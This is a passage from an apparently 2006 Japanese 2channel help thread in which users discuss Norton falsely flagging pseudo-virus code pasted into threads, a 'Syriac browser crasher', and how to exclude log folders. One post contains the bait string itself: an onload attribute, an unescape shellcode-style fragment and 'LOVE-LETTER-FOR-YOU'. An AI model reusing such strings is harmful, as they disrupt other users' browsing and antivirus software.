それでも駄目なままです。
他に何をしないといけないんでしょうか?

562 名前:ひよこ名無しさん mailto:sage [2006/06/05(月) 19:44:30 ID:???]
ここを読み直せ

563 名前:ひよこ名無しさん [2006/06/06(火) 18:14:41 ID:yssu6HWa]
ウィルスコードに反応したせいで、取得したログが消滅するのについては、
ログフォルダを除外すればいけるわけですが、
最近のウィルスコードは進化してて、
Autoblockで侵入感知反応してしまって、
2chの該当IPをアク禁にしてしまってるようなんです。
この場合の対応はどのようにすればよいでしょうか?
ノートン切らないと、ログを取得するどころか、
スレ単位、はなはだしくは板単位でアクセスすらできません。

564 名前:ひよこ名無しさん mailto:sage [2006/06/06(火) 18:17:44 ID:???]
>>563
リカバリしろデブ。

565 名前:ひよこ名無しさん mailto:sage [2006/06/06(火) 18:30:21 ID:???]
どの専ブラでも基本はログと書き込みフォルダを
除外すればおk?



566 名前:ぴーこ名無しさん mailto:sage [2006/06/07(水) 01:17:37 ID:???]
>>563
mickey.mirv.net/2chnis.html

>>565
ttp://ansitu.xrea.jp/guidance/?Trap#NortonTrap の3番目
詳しくはお使いの2ちゃんねるブラウザのヘルプ・スレ等で確認してください。

567 名前:ひよこ名無しさん mailto:sage [2006/06/07(水) 18:58:51 ID:???]
>>564
リカバリしろデブ。

568 名前:<body onload=window()> mailto:eip = eip + unescape("%u7030%u4300") [2006/06/08(木) 03:34:49 ID:???]
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU

569 名前:ひよこ名無しさん mailto:sage [2006/06/08(木) 03:36:10 ID:???]
>568

570 名前:ひよこ名無しさん mailto:sage [2006/06/08(木) 04:18:57 ID:???]
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、
ウィルスソフトは反応しなかったのですが、
いきなり2ちゃん掲示板の行間が広くなってしまいました。
ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから
ウィルスチェックをしましたが反応なし。

これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか?

ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。

571 名前:ひよこ名無しさん mailto:sage [2006/06/08(木) 04:21:40 ID:???]
570ですが補足です。
表示したスレは
ttp://news19.2ch.net/test/read.cgi/newsplus/1149683324/l50
で、ここの>>5にそのソースが書いてありました。

572 名前:ひよこ名無しさん mailto:sage [2006/06/08(木) 04:23:53 ID:???]
>>570
行間が広くなるのはシリア語ブラクラじゃないのか?

573 名前:ひよこ名無しさん mailto:sage [2006/06/08(木) 04:27:58 ID:???]
>>571
5の最後の行にシリア語書いてあるね

574 名前:ひよこ名無しさん mailto:sage [2006/06/08(木) 04:48:56 ID:???]
>>572-573
レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ

さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?

575 名前:ひよこ名無しさん mailto:sage [2006/06/08(木) 05:11:57 ID:???]
     / ̄ ̄ ̄ ̄ ̄ ̄ ̄\ 
    | ○。         |
    ノノ)            从
   ( i从〓〓      〓〓.从
   .从-=・=-      -=・=-从
  从从.        l       从)
  (从.l∴      ∨     ∴从人)
 (人人|∴ ヽ  .ー===-' ./.∴..从人)  <無職元祖ぶる殿 ◆U/gDqFZzsY蚤
 (人人|∴∴!    ̄   !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)
..(人人人_人____人_.人人人)
〔ノ二二,___       __,二二ヽ〕
 |:::::::::::::::::::::::::ヽ゜   ゜/:::::::::::::::::::::::::/
 〉::::::::: :::::::::::::〉__∩__〈:::::::::::::: ::::::::〈 
 |:::::::::::::::::::::::/\ ̄/ヽ:::::::::::::::::::::/
〔:::::::::::::::::::::/  ノ ~ヽ  ヽ::::::::::::::::::|
ヽ:::::::::::::::::/ /:::::::::::: \ ):::::::::::::::::::ゝ
ノ:::::::::::::::::::| |_〜─ー= - | |〜〜〜/



576 名前:ひよこ名無しさん mailto:age [2006/06/12(月) 11:39:57 ID:???]
このスレだと反応しないのは何で?

577 名前:ひよこ名無しさん mailto:sage [2006/06/13(火) 14:13:25 ID:???]
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
ttp://ansitu.xrea.jp/guidance/?NortonInternetSecurity
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。

エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?





[ 続きを読む ] / [ 携帯版 ]
前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<258KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef